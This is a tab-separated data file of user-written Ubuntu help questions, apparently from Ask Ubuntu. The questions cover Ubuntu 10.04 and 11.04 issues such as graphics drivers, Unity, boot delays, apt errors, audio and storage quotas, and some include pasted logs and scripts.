45930	how do i create a restore disk ?	i 'm new to ubuntu and reinstalled 11.04 atleast 10 times already . each time i reconfigure all my settings and end up breaking something . it is really annoying and would be much easier if i can save everything onto a cd and reinstall from the cd so my settings would be restored like in windows . thank you in advance .
45934	multipath only sees 2.0t of 4.8t	i have been given 4.8t of san storage to my ubuntu 10.04 64bit server . multipath only sees 2.0t . is this a limitation of ubuntu or multipath ; or am i doing something wrong ? example output : 36000d77a0000974f6367a370c8e09342dm-3 falcon , ipstor disk [ size=2.0t ] [ features=0 ] [ hwhandler=0 ] \\_ round-robin 0 [ prio=1 ] [ active ] \\_ 1:0:2:2 sdr 65:16 [ active ] [ ready ] \\_ round-robin 0 [ prio=1 ] [ enabled ] \\_ 0:0:2:2 sdi 8:128 [ active ] [ ready ] \\_ round-robin 0 [ prio=1 ] [ enabled ] \\_ 0:0:3:2 sdl 8:176 [ active ] [ ready ] \\_ round-robin 0 [ prio=1 ] [ enabled ] \\_ 1:0:1:2 sdo 8:224 [ active ] [ ready ]
45946	lenovo thinkpad r500 having problems resuming	yesterday i installed ubuntu 11.04 from scratch on my thinkpad r500 , leaving the default power management settings . yesterday i closed the lid , and this morning when i opened it the laptop resumed correctly . today during lunch the laptop went to sleep without me closing the lid , and there was no way to wake it up by typing esc or moving the mouse or trackpoint . no disk activity at all . when i briefly pushed the power button , the laptop rebooted completely , losing my opened applications . is it a known problem with natty/lenovo thinkpad r500/ati ? any idea what could fix the problem ?
45948	how do i remove dolphin and all of its dependencies ?	i 'm running ubuntu 11.04 with unity . recently i found that dolphin file manager and some qt libraries was installed in my distro , i guess it was installed as a dependency along with some qt softwares ( qbittorent , smplayer etc. , ) well i can do 'sudo apt-get remove dolphin ' but pls.suggest me the best way to remove all the unwanted libraries/dependencies of qt . thanks in advance
45949	how can i push/stream media to my ubuntu box from a dnla device	i would like to use my ubuntu box as the equivalent of a dnlp enabled tv . i would like to be able to from my phone , send video to the computer 's monitor . so basically the opposite of using vlc to play a video from a network source ; i 'm looking to have the network source push the video to the computer . are there any programs for this ?
45950	ca n't restore firefox bookmarks from json backup	before reinstalling ubuntu , i backed up my bookmarks as a json file using firefox 7.0a1-32bit on ubuntu 10.10 . using ubuntu 11.04 , when trying to restore the backup , i get the following error : using firefox 4.0.1 , same message using firefox 7.0a1-64bit is it a known problem , or did i do something wrong ?
45959	notify pcm volume change instead of master ?	i prefer to leave the master volume at 100 % and just adjust volume with pcm . i used this askubuntu answer to separate the controlling of each of these channels . unfortunately the volume applet and notification pop-pup are linked to the master channel . how can i change these to give me information on pcm audio channel instead of master ?
45960	data visualization tools ?	i am looking for data visualisation tools on ubuntu . i have been using r and gnuplot , however , i am looking for better than these and also simple to use ( not office excel ) .
45962	how many paid ubuntu developers are there ?	how many paid developers work on developing ubuntu ? how many of them are on ask ubuntu ? when i say `` work '' i mean they get a monetary reward ( salary ) for working/participating in the development of it .
45964	clicking font selector in portable photoshop cs4 in 11.04 causes force quit ?	when i am running cs4 portable in wine and i select the font button in the application , it force quits . i do have the microsoft core fonts installed . any ideas ? ( it never used to do this until i uninstalled and reinstalled wine multiple times )
45970	missing date & time applet from top unity panel	i like unity very much . recently , i installed compiz manager and nautilus elementary also then tried to play . during some of my playing around , unity 's clock applet has vanished . i want to make it show the time again . how can i do this ?
45976	where can i find information or description of the boot up process ?	i am looking for links to detailed information on how the ubuntu boot process is managed after grub is finished . i have googled by all the documentation referes to individual packages . ( upstart , init* directories and links , the rc* directories , startup manager ) i still do n't understand how they are called which one starts first . i don t understand how changes will affect the boot up process . i was hoping to find a nice detailed explanation of the ubuntu boot up process . i am looking to better understand what is going on and how things work under the hood . i prefer to have a good understanding be for making changes .
45977	some applications use `` archaic '' character instead of modern japanese one	i just installed natty from scratch with default options and english ui . i did not change any font settings . i happen to also read japanese , it mostly displays fine but the ç¤ž character ( meaning `` company '' , a widely-used character ) is sometimes displayed using its archaic form , which can not be seen anymore except in temples and old places . so why use it in ubuntu ? i guess it is a bug with this font ? how to fix it ? see below , green-circled is good , red-circled is bad : notes : only firefox and libre office seem to display the character properly . this character used to show fine on older ubuntus , but on the contrary the `` ç´ '' had the same problem at that time , and it is solved now .
45978	unity with geforce fx 5200	i have a computer with a nvidia geforce fx 5200 with the nvidia binary driver ( version 173 ) my computer wont boot . i get a white screen with random black characters on it . with the experimental open source 3d support everything works expect that all the icons in the dock are not shown , ( the dock still works , auto hides , hover help , clicks , etc works ) how can i use unity . ( 10.10 ran excellently with full compiz effects )
45979	nautilus open in remote terminal	as i already wrote , open-in-erminal package does not work for remote hosts for me nautilus `` open in remote teminal '' fails after login . so i decided to try to write my own script to do same thing . i will run it when i 'm on location like `` sftp : //user @ myserver.net '' i added script like this in /home/ [ user ] /.gnome2/nautilus-scripts to get started : # ! /bin/sh gnome-terminal -- execute '/usr/bin/ssh user @ myserver.net' but , it fails with : there was an error creating the child process for this terminal . failed to execute child process `` /usr/bin/ssh user @ myserver.net '' ( no such file or directory ) any idea why this happens .
45983	anacron mailing weird errors	since update to 11.04 , i keep receiving messages from 'anacron ' , with some errors . two types of messages , actually . the first of those types is like : /etc/cron.daily/logrotate : /etc/denyhosts.conf : 28 : secure_log : not found /etc/denyhosts.conf : 36 : hosts_deny : not found /etc/denyhosts.conf : 60 : purge_deny : not found /etc/denyhosts.conf : 95 : block_service : not found /etc/denyhosts.conf : 110 : deny_threshold_invalid : not found /etc/denyhosts.conf : 121 : deny_threshold_valid : not found /etc/denyhosts.conf : 131 : deny_threshold_root : not found /etc/denyhosts.conf : 142 : deny_threshold_restricted : not found /etc/denyhosts.conf : 155 : work_dir : not found /etc/denyhosts.conf : 200 : lock_file : not found /etc/denyhosts.conf : 221 : admin_email : not found /etc/denyhosts.conf : 232 : smtp_host : not found /etc/denyhosts.conf : 233 : smtp_port : not found /etc/denyhosts.conf : 252 : syntax error : newline unexpected error : error running non-shared postrotate script for /var/log/denyhosts of '/var/log/denyhosts ' run-parts : /etc/cron.daily/logrotate exited with return code 1 these are the corresponding entries in /etc/denyhosts.conf secure_log = /var/log/auth.log hosts_deny = /etc/hosts.deny purge_deny = 1w block_service = sshd deny_threshold_invalid = 5 deny_threshold_valid = 10 deny_threshold_root = 1 deny_threshold_restricted = 1 work_dir = /var/lib/denyhosts lock_file = /var/run/denyhosts.pid admin_email = root @ localhost smtp_host = localhost smtp_port = 25 all of them seem fine to me . also , lines 251-253 in the same file go like : # smtp_from = denyhosts < denyhosts @ localhost > # so i do n't see the `` unexpected newline '' , either ... the other type of mail message i get from 'anacron ' is : /etc/cron.daily/popularity-contest : readline ( ) on closed filehandle files at /usr/sbin/popularity-contest line 104 . ( with the former line repeated some tens times ) any hint on these messages ?
45992	how can i do these things in unity ?	there are a few things that i used to do regularly with the `` ubuntu classic '' interface and i ca n't figure out how to do them with the unity interface ( provided it is possible to do them at all ) : open a file at a specific location : i used to type alt+f2 then type the complete path to the file ( with tab completion ) and then hitting enter would just open the file . it seems to me that there is no way to do the same thing in unity . searching for the filename is not really an option as there may be multiple files with the same name in different locations . single click window selection : thanks to the windows list applet in the panel , i could switch from one window to the other ( within a workspace ) with a single click . can i do this in unity ? it seems to me that this is not possible . single click workspace switch : thanks to the workspace applet in the panel i could switch to a different workspace with a single click or move a window to another workspace very easily by dragging it in the workspace applet . in unity i have to move the cursor on the left border , wait that the lancher pops up , click on the workspace switcher , wait that the workspaces pop up and the i have to double-click on the ws i want . this is waaaay to slow . any other option ? thanks alfredo
45996	how can i know if nvidia vdpau is working for mplayer/vlc/totem ?	i have a laptop with a discrete nvidia graphics card . how can i know if my video player be it mplayer or vlc or totem is using nvidia vdpau or not ? for example , running mplayer2 with the script below , i get this message : failed to open vdpau backend libvdpau_nvidia.so : can not open shared object file : no such file or directory but i do have such file in the system : -rw-r -- r -- 1 root root 1800952 2011-11-23 07:39 /usr/lib/nvidia-current/vdpau/libvdpau_nvidia.so.290.10 script to find out codec for a file : # ! /bin/bash # script to automatically find out which codec a file is using and determine whether or not to use vdpau . # if no input display usage if [ -z `` $ 1 '' ] ; then echo usage : $ 0 /path/to/file exit fi # remember to change this to the path of your mplayer binary mplayerlocation=/usr/bin/ cd $ mplayerlocation # kinda a lame way to do it , but bring up mplayer and pipe the output to a temporary file , then read which codec the file is ./mplayer -identify -vo vdpau $ 1 > /tmp/videocodec & sleep 0.5 killall mplayer videocodec=`cat /tmp/videocodec | grep id_video_codec | cut -c 16-25` rm /tmp/videocodec echo `` video codec : $ videocodec '' if [ $ videocodec = `` ffh264 '' ] ; then codec='h264' echo \n playing $ 1 with $ codec codec \n ./mplayer -vo vdpau -vc ffh264vdpau $ 1 exit fi if [ $ videocodec = `` ffmpeg2 '' ] ; then codec='mpeg2' echo \n playing $ 1 with $ codec codec \n ./mplayer -vo vdpau -vc ffmpeg12vdpau $ 1 exit fi if [ $ videocodec = `` ffwmv3 '' ] ; then codec='wmv3' echo \n playing $ 1 with $ codec codec \n ./mplayer -vo vdpau -vc ffwmv3vdpau $ 1 exit fi # vc1 is not supported on most gpus # uncomment if it is supported on your gpu # if [ $ videocodec = `` ffvc1 '' ] ; then # codec='vc1' # echo \n playing $ 1 with $ codec codec \n # ./mplayer -vo vdpau -vc ffvc1vdpau $ 1 # # exit # fi # if it isnt one of those it is not supported by vdpau # so we should play without vdpau ./mplayer $ 1 exit edit : apparently it ca n't find the library , not even when calling it via bumblebee 's v3 optirun , although the library is there : optirun vdpauinfo display : :0.0 screen : 0 failed to open vdpau backend libvdpau_nvidia.so : can not open shared object file : no such file or directory error creating vdpau device : 1 avilella @ magneto : ~ $ locate libvdpau_nvidia.so | xargs ls /usr/lib/nvidia-current/vdpau/libvdpau_nvidia.so /usr/lib/nvidia-current/vdpau/libvdpau_nvidia.so.1 /usr/lib/nvidia-current/vdpau/libvdpau_nvidia.so.290.10 edit2 : i tried again with ubuntu 12.04 and i still ca n't get it to work .
46004	hp probook 4520s .. drivers problem	sa , i have hp probook 4520s core i5 it comes with suse enterprise 11 and everything working but when i removed it and installed ubuntu i got i problems with drivers nothing working graphic is ati radeon hd 6370.. ubuntu hardware found driver for 6300m and i installed it but i still have problem it is wrong driver synaptic toucpad right click is n't working also turn on/off key is n't working . i tried synaptiks but it did n't solve anything i 've problem with wireless /bluetooth the keyboard wifi key led becomes crazy . its light keeps going on and off continuously ( red -white - red - white ... ... . ) i tried fedora 15 and i got the same problems i found drivers on hp for suse enterprise 11 i tried to use synaptic driver but it didn't suse drivers on hp site : hp probook 4520s notebook pc
46006	audio not working macbook air 3,2 nvidia mcp89	i 've upgraded to ubuntu 11.04 and since then the audio stopped working ( i was on 10.10 before that ) . i 'm using a macbook air 3,2 and these are details of my audio card : description : audio device product : mcp89 high definition audio vendor : nvidia corporation physical id : 8 bus info : pci @ 0000:00:08.0 version : a2 width : 32 bits clock : 66mhz capabilities : pm msi ht bus_master cap_list configuration : driver=hda intel latency=0 maxlatency=5 mingnt=2 it does n't work either with headphones or speakers . alsa mixer does n't show anything muted and all the volumes are up .
46008	ca n't log in - cycles through black screen	i just installed a new update then restarted my laptop . the update was recommended , as i have n't logged in in a while . however now when i start my laptop , i am stuck in a cycle of login screen - > black screen - > and back to the login screen . my credentials are correct , etc , and its looks like it will continue to log in however it reverts back to the login screen . anyone has any idea how to overcome this problem ? how to get into my system without needed this log in ? i have tried logging in with the failsafe gnome and xtern etc , but it makes no difference . i have seen something about 'systemrescuecd ' however i do not have access to a computer with cd burning capabilities for at present , so i unfortunately do not have that way out at the moment .
46011	is it possible to disable a cpu ( not a core ) ?	is it possible to disable a cpu , not a core ? i want to do a test to verify if the performance could make a big difference or not . i 'm using ubuntu 10.10 .
46015	how do i perform a command line install when the alternate cd boots to efi and grub2	i have a lenovo x120e , and when i boot the alternate cd i get a grub2 bootloader . how do i select a command line install from the grub2 bootloader ? is there a switch , option , or flag i can pass to start the minimal install vs the full installer ?
46016	how to login into a machine via putty using a script ?	in windows we have created a batch file to login into a machine via putty . on clicking the batch file it logins into that machine . is it possible to create a script in ubuntu to do the same task ?
46020	how to add a mime type with a project created in quickly ?	i 've built an application i want to release however i would like the files to open with the application . i have modified the .desktop file accordingly , however quickly seems to have no option for mime files and i do n't have a clue how to add them . ( also , i 'm not sure if this belongs here , because it 's a developer question but quickly was made by ubuntu )
46021	connected to wpa-secured network , but no internet	my ubuntu machine can connect to my wpa network , but there 's not a trickle of internet to be found . it works fine with another ( but farther ) wep network . windows system on the wpa network work fine ( i 'm using one to write this question ) . wired connection to the router broadcasting the problematic network is also fine . do note that i did not try to connect to network using windows on the same machine . it 's an atheros card - i will include more details if requested . oh and i the other systems on the network are visible as well . edit i 've removed the ethernet details from the following output : ~ $ sudo lshw -class network *-network description : wireless interface product : ar5001 wireless network adapter vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan2 version : 01 serial : 00:22:69:18 : f1 : d3 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath5k driverversion=2.6.38-8-generic firmware=n/a ip=192.168.2.7 latency=0 link=yes multicast=yes wireless=ieee 802.11bg resources : irq:18 memory:55200000-5520ffff
46025	boot time over 20 minutes on a virtual server	i have a virtual server hosted by professionals with ubuntu 10.04 installed . it is a standard server installation with lamp package and no custom modifications . after recent updates via aptitude boot time of the machine have increased dramatically to over 20 minutes . i noticed that this problem started occurring after updates of linux kernel . the current version is : linux ubuntu-1004-lucid-64-minimal 2.6.32-32-server judging from the output of dmesg it looks like some sort of a problem with usb controller or drivers ( dmesg output below ) . what i do n't understand is why it started to happen ? and what is the solution/workaround to this problem . i 've found that some people had similar problems and proposed solutions were either disabling usb legacy support in bios or upgrading firmware . as i have already mentioned , this machine is a virtual server , so i do n't have access to bios and hardware . [ 0.197693 ] ehci_hcd : usb 2.0 'enhanced ' host controller ( ehci ) driver [ 0.198259 ] ohci_hcd : usb 1.1 'open ' host controller ( ohci ) driver [ 0.198723 ] uhci_hcd : usb universal host controller interface driver [ 0.199237 ] uhci_hcd 0000:00:01.2 : pci int d - > link [ lnkd ] - > gsi 11 ( level , high ) - > irq 11 [ 0.199979 ] uhci_hcd 0000:00:01.2 : setting latency timer to 64 [ 0.199988 ] uhci_hcd 0000:00:01.2 : uhci host controller [ 0.200470 ] uhci_hcd 0000:00:01.2 : new usb bus registered , assigned bus number 1 [ 0.201313 ] uhci_hcd 0000:00:01.2 : irq 11 , io base 0x0000c020 [ 0.201917 ] usb usb1 : configuration # 1 chosen from 1 choice [ 1253.897084 ] hub 1-0:1.0 : usb hub found [ 1253.897529 ] hub 1-0:1.0 : 2 ports detected [ 1253.897963 ] pnp : ps/2 controller [ pnp0303 : kbd , pnp0f13 : mou ] at 0x60,0x64 irq 1,12 [ 1253.899106 ] serio : i8042 kbd port at 0x60,0x64 irq 1 [ 1253.899529 ] serio : i8042 aux port at 0x60,0x64 irq 12 [ 1253.914297 ] mice : ps/2 mouse device common for all mice [ 1253.915268 ] rtc_cmos 00:01 : rtc core : registered rtc_cmos as rtc0 [ 1253.916198 ] rtc0 : alarms up to one day , 114 bytes nvram , hpet irqs [ 1253.917255 ] device-mapper : uevent : version 1.0.3 [ 1253.920528 ] input : at translated set 2 keyboard as /devices/platform/i8042/serio0/input/input2 update 1 the problem just went away , on 2 separate servers . after several reboots the 20 minute delay no longer occurs . no modifications to the server configuration have been made . i am suspecting that either : kernel learned itself how to eliminate the delay or hosting provider changed hardware configuration ( improbable due to short time span ) i will keep monitoring boot times and will update the question if it occurs again . update 2 the problem still exists ! it seems to occur only when reboots are days aways from each other . consecutive reboots do n't produce this delay . adding noapic flag to boot parameters does not help . the delay always occurs between the following lines of dmesg , with varying duration : [ 0.189478 ] usb usb1 : configuration # 1 chosen from 1 choice [ 487.589964 ] hub 1-0:1.0 : usb hub found can anyone help ?
46031	how to copy/paste text without formatting by default ?	i 'm running ubuntu 10.04 and i find it annoying that by default the copy/paste functionality also pastes the text format . most of the time when i copy/paste text i only want to paste the ascii text without any formatting . is there a way to configure that behavior ?
46032	meaning of `` netinet '' in socket programming	what are the meanings of `` netinet '' and `` in '' in `` # include < netinet/in.h > '' ?
46033	system monitor ( panel ) shows the wrong amount of used ram	my system monitor in the upper panel show the wrong amount of ram . as shown in my screenshot . is this a bug or can i fix this in any way ? my laptop freezes once a day , it 's starting to be a real problem . the red rectangle in my right upper panel is full when it should be half full .
46040	server partitioner hangs at 43 %	i bought this server for work ( a cheapy ) : http : //www.tigerdirect.ca/applications/searchtools/item-details.asp ? edpno=7220575 & catid=2683 to upgrade our wamp server to a newer lamp server . it appears the raid-5 is actually a fakeraid which is very unfortunate for me . anyway , i 'm trying to install a 64-bit 10.04.2 lucid server from a usb-key and the partitioner seems to hang at 43 % . before the partitioner loads it asks me to `` activate serial ata devices '' and i 've tried both `` yes '' and `` no '' . i did a sha1sum on the iso and it says it 's `` ok '' . i was also able to hit ctrl+alt+f2 and run tail -n 20 /var/log/partman and saw no error . what else can i do to debug this problem ?
46042	compiz config wo n't start	a month ago i asked a question regarding the ccsm and workspaces settings . how do i set the number of workspaces ? a few days ago i realized that ccsm was n't even on when i 'm logging into ubuntu , and now , each time i log out and back in , i have to use compiz -- replace & just to run it manually , which is quite a pain to do each time . since i upgraded to natty narwhal i got this problem . i was wondering what do i need to do in order to fix that problem ( needless to say that reinstalling ccsm does n't really work ) . thnx royi
46043	what do you think is the coolest wallpaper for ubuntu ?	though it is a subjective matter , i am curious to know that you think is the coolest wallpaper for ubuntu or which wallpaper most users of askubuntu.com like ?
46048	firefox 4.0.1 crash intermittently and log out	intermittently firefox 4.0.1 is crashing on ubuntu 11.04 and logging out . sometimes it happens if i open an arbitrary website such as http : //www.omgubuntu.co.uk i am not streaming any videos . please let me know how to solve this or at least reasons behind this .
46053	how can i sort packages by ratings / downloads in ubuntu software centre ?	i wanted to see which packages in certain category are most popular in order to try them . is that possible to accomplish in ubuntu software centre ? i did n't see any sorting capabilities there , unfortunately . thanks .
46059	`` disk quota exceeded '' error	in our lab , nfs server has been setup . this server has home directories of all users . quota is enabled for all users . root @ server : /users/labuser # du -sh 69m . root @ lab-01 : ~ # quota -su labuser disk quotas for user labuser ( uid 52022 ) : filesystem blocks quota limit grace files quota limit grace 10.x.y.z : /users 301m* 196m 200m none 1903 0 0 'du -sh ' shows 69mb whereas quota shows 301m . user is getting `` disk quota exceeded '' error . he is unable to create/save any file/directory . what could be the problem ?
46060	latest kernel version crashes on boot . how to investigate ?	i have amd athlon xp1600+ with 623 mb of ram . it was running fine with kernel 2.6.32-31-generic until i installed the latest updates . after updating ubuntu requested to restart the computer . as soon as the computer boots , the system crashes immediately , starting up , crashing , also . when a key is pressed , the grub menu appears . after selecting the kernel 2.6.32-31-generic the system boots normally . both 2.6.32-32 entries ( normal and recovery ) are crashing . there are no visible entries in the log-files made . what can go wrong ? how can i figure out what is going wrong ?
46062	how can i remove gnome-settings-daemon from indicators applications ?	i have a desktop configuration in the indicator applications to choose the desktop preferences , but i dont know how to disable it . i know i can use the blacklist in .config/indicators . but actually i did n't manage to disable it .
46065	problems with nvidia drivers on dell xps	just trying to install ubuntu on my laptop and ca n't get nvidia drivers to work . have been googling and trying for a while , but since i am not used to ubuntu i am not sure quite how to diagnose the problem , whether is a bug and should be attached , and plus a lot of the information on google seems quite old . my laptop is a dell xps , with a 1gb nvidia geforce gt 550m graphics card , which , according to here , http : //www.nvidia.com/object/linux-display-ia32-270.41.19-driver.html , should be supported . i am trying to install ubuntu natty 11.04 . first of all , the often mentioned system- > administration- > hardware drivers is n't there on my installation , there is however a system- > administration- > additional drivers . it shows only one entry , nvidia accelerated graphics driver . on the bottom it says `` the driver is activated but not currently in use . '' i have re-installed nvidia-current a few times , restart a few times , to no avail . system-administration- > hardware yields `` you do not appear to be using the nvidia x driver . please edit your x configuration file ( just run nvidia-xconfig as root ) , and restart the x server . '' running nvidia-xconfig tells me that it ca n't find an xorg.conf , and is generating a new one . with that xorg.conf , the computer fails to start the x server back up again until i delete the xorg.conf again . xorg -configure returns a very strange xorg.conf with 5 screens . here some more output florian @ floworklinux : ~ $ /usr/lib/nux/unity_support_test -p xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . error : unable to create the opengl context florian @ floworklinux : ~ $ sudo lshw -c display *-display description : vga compatible controller product : nvidia corporation vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nvidia latency=0 resources : irq:16 memory : f0000000-f1ffffff memory : c0000000-cfffffff memory : d0000000-d3ffffff ioport:4000 ( size=128 ) memory : f2000000-f207ffff *-display description : vga compatible controller product : 2nd generation core processor family integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:52 memory : f2400000-f27fffff memory : e0000000-efffffff ioport:5000 ( size=64 ) florian @ floworklinux : ~ $ lspci | grep nvidia 01:00.0 vga compatible controller : nvidia corporation device 0dd6 ( rev a1 ) the bit of the generated xorg.conf that relates to nvidia is section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' endsection help appreciated , thanks
46070	combine 2 or more mov/avi files side-by-side ?	i have several cameras that capture multiple viewpoints of the same location . i want to show the views side-by-side so that we can see what happened from all the angles at one time . i 'm on ubuntu 10.10 and willing to try anything .
46080	flickr.com & imagekind.com crashing my browser and effects ?	my ubuntu 11.04 ( installed 2 days ago ) is misbehaving . when i try to upload an image via flickr or imagekind my browsers ( firefox and chrome ) crash . it even causes the `` run a command '' window not to respond . when i run killall -9 < browser-app-name > the browser window and space on the menu bar remains occupied / in an unusable state . this problem started happening a couple of days ago . it also has a tendency to crash my window frames and effects , which i use compiz -- restore to fix . what could be causing this and how can it be fixed ?
46091	how to remove corrupted repositories ?	i was in the process of updating 11.04 and came across and error message saying : reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_natty-security_main_i18n_translation-en e : the package lists or status file could not be parsed or opened . i tried to remove the damage repository by going to ubuntu software center . there was no option of repository removal . then i tried synaptic , however i got the same error message stated above . i can not find software source in 11.04 . how do i remove repository from the commandline since that seems to be my only option ?
46092	are there any ppas or debs for postler and dexter ?	are there any ppas or .deb files i can download in order to get the elementary applications postler and dexter in ubuntu 10.04 ? i have tried the postler-dev ppa but it does not have builds for 10.04 .
46093	moving/copying file in ubuntu one folders triggers re-upload	i 've several large files stored in u1 . when i move a file to another folder ( which is also synced ) it triggers a re-upload of the file . the same happens if i copy the file to another folder . does n't u1 use the hash to identify similar files and save bandwith ? using u1 on lucid .
46095	how do i find a string ( and some lines before and after ) in a huge file by terminal ?	i want to display three or four lines before and after a certain string in a really huge file , which i can ' topen with vi . how is this done ? i tryed grep -i -n -r 'mysearchstring' but this only gives me one line . i need some lines before and after to get the context ! thanks ! i once have seen a terminal command , that does that , but i forgot and i ca n't find it again . : /
46103	how do i run fckeditor ?	i installed fckeditor by using ubuntu software center successfully . but i do not know how can i run it . how can i accomplish my goal if ubuntu menu does dot contain any link which refers to it ? where is it located ?
46106	how to set serial ports uart to none for lirc ?	lirc_serial wo n't load because the serial port is already in use . dmesg reports [ 12.245857 ] lirc_serial : port 03f8 already in use [ 12.245862 ] lirc_serial : use 'setserial /dev/ttysx uart none' back in the days i used to edit a file called /var/lib/setserial/autoserial.conf or /etc/serial.conf to set uart to none on the corresponding serial port . the first does n't help and the later does n't exist no more . all the howtos and threads on message boards concerning lirc are from the stoneage . can somebody help me ?
46117	open password protected rar archieve just keeps asking for the password but wo n't open halfway thru	i downloaded a rar archieve with a quite big file inside , and right-click , choose extract here and enter the password . it starts extraxting , and i can see the file and view parts of it ( since the process is not done ) , but after a while it just keeps popping up the password-window , i type it , press enter ( i am sure it 's the correct password ) and it seems idle for a time but then repeats that . and so it goes on , but nothing more is extraxted than theese fragments of the file . when i do unrar e file.rar . it asks for the password , i enter it and it goes on and extracts a fragment of the file , but then just stops . is there a way to go around this , or at least make the wmv-film kinda watchable , with gaps ?
46119	problem with update manager	when i start the update manager it shows me this message : could not initialize the package information an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : type '/tualatrix/ppa/ubuntu ' is not known on line 3 in source list /etc/apt/sources.list.d/tualatrix-ppa-natty.list '' please i want help .
46122	how do i get my google contact 's birthdays to show up in evolution calendar ?	i have synced evolution to my google calendar and google contacts . that went well . but why ca n't i edit any of my contact 's birthdays in evolution ? and why are those birthdays not displayed in evolution 's calendar ? the birthdays are present in the webcalendar of google . edit : i had allready tried the method suggested by kory wnuk in one of the answers below . for some reason i ca n't click okay in that dialog :
46126	nautilus-clutterflow only works in `` sudo-mode ''	could any body help ? why is nautilus elementary 's `` clutterflow '' only active when nautilus is started as `` sudo nautilus '' ? i ran `` nautilus -q '' and got this error : '' nautilus -q '' generates an error ... in ubuntu 11.04 . following error : ( nautilus:3746 ) : unique-dbus-warning * : error while sending message : message did not receive a reply ( timeout by message bus ) . * now , i ran the same command `` sudo nautilus -q '' and nothing happend . but running `` nautilus & '' without `` -q '' brings up the browser , but clutterflow wo n't work either . clutterflow only works with `` sudo nautilus & '' but i do n't want to be surfing around in super user mode ... , how can i resolve this ? thanks for reading and please respond if you can !
46128	is it now safe to install/uninstall gnome 3 from the ppa ?	i saw a question where someone mentioned having gnome3 + unity on the same system . when will it be possible ? nb : i 'm referring to installing from the gnome3 ppa . please do not tell me how to add the ppa , about installing from git , or skinning unicorns : ) ... read the question carefully and provide a relevant answer : d .
46138	will the tp-link tl-wr941nd wireless router work with ubuntu 11.04 ?	will the tl-wr941nd work with ubuntu 11.04 ?
46141	how to measure performance of a web browser ?	i am curious to know which browser is the fastest one on my thinkpad x300 running ubuntu 11.04 . could someone tell me how to measure performance of a browser on ubuntu 11.04 , please ?
46143	error when installing xampp	i 'm trying to install xampp on my computer but as i try to extract the file and move it to the opt folder i get these errors . cd desktop sudo -s tar xvfz xampp-linux-1.7.4.tar.gz ... ... ... ... ... ... ... ... .after extracting ... ... ... ... ... ... ... .. gzip : stdin : unexpected end of file lampp/phpmyadmin/libraries/tcpdf/font/dejavuserif.ctg.z lampp/phpmyadmin/libraries/tcpdf/font/dejavuserif.ctg.z tar : unexpected eof in archive tar : unexpected eof in archive tar : error is not recoverable : exiting now
46145	resolution stuck at 1024x768	in an attempt to fix some minor issues with the splash screen , i ran this script : http : //www.webupd8.org/2010/10/script-to-fix-ubuntu-plymouth-for.html big mistake . my resolution is now stuck at 1024x768 ( the screen is 1280x900 ) . i ca n't change it through the monitors settings , and either there 's lots of old guides out there or my xorg config does n't exist . i tried running the cleanup version of the `` fix script '' but nothing changed . oh and the graphics settings are also at minimum all of a sudden . i also tried all sorts of dpkg -- reconfigures , no luck there either . alexander @ natty : ~ $ xrandr xrandr : failed to get size of gamma for output default screen 0 : minimum 800 x 600 , current 1024 x 768 , maximum 1024 x 768 default connected 1024x768+0+0 0mm x 0mm 1024x768 61.0* 800x600 61.0
46148	danger of overlay scrollbar in natty	at first i liked the new scroll bar on natty , but it is prone to accidental clicks . see for instance the screenshot below : it is easy to click `` remove '' as the scroller fades out , or before it appeared , or when it fails to appear . i accidentally removed a startup app because of this . is it to avoid this danger while still using overlay scrollbars ? maybe something that would make nearby background dialogs unclickable ?
46149	unity logon takes a long time	i am running unity on ubuntu 11.04 . the logon time from the time i type my password to the time the unity launcher is shown is unusually long . ( over a min ) . error logs are showing timeouts for some autostart software . how do i troubleshoot this ? which file should i look at ?
46155	require button press to open unity launcher to resolve usability issues	general discussion of usability issue i 'm having a few usability issues with the unity launcher . i 'm using 11.04 with the auto-hide feature activated . when i go to close a window ( or press the back button in a web browser ) that is tiled on the left of the screen , i often activate the launcher which then covers the close button and the back button on the browser . of course i could approach the back or close buttons slowly from the bottom and thereby avoid hitting the top left of the screen and activating the launcher . however , i have evolved the habit , presumably because it is more efficient , of doing the gross mouse move up to the very top left of the screen , and then the nuanced smaller move down to the close or back button . i think this is a standard principle of mouse movement in human-computer interaction . below is a screenshot of what i see , when my mouse goes slightly too far up and activates the launcher and hides the back and close buttons , which i was intending to press : question thus , is there a way of making the unity launcher only show in response to a button click ? update : there is some other recognition of this issue here : http : //ubuntuforums.org/showthread.php ? t=1767743 i note that when i start `` launcher and menus '' there are only two choices . `` pushes the left edge of the screen and touches the top left corner of the screen '' . thus , this option may persist over and above reveal mode .
46156	how to replace mapquest in evolution adressbook with another map provider like google maps ?	how to replace mapquest.com in evolution adressbook with another map provider like google maps ? if found no solution so far . no option in the gnome settings . nothing in a google search .
46160	ping tester equivalent software in ubuntu	can anyone recommend a equivalent software for ping tester ?
46164	is there a color scheme generator for the desktop that can simulate color blindness ?	are there any color scheme generators that can simulate color blindness and export these results to a color palette file or generate a css stylesheet ? i 've used gpick and was recently introduced to this website but i 'm really after a desktop application ( for when i 'm not connected to the internet ) that can generate color schemes . are there any applications that can do that ?
46172	which keyboard layout do i choose on installation	when installing i am presented a rather lengthy list of keyboard layouts to choose from : choosing the default layout on top of the list seems fine but i am wondering what differences there are between the other layouts in this list . how do i find out what layout fits my keyboard best ?
46175	how can i reduce the ubuntu install size to the minimum , with gui ?	i want to install ubuntu , with the minimal packages for web browsing . installation should be under 2gb . any ideas ? where can i start ?
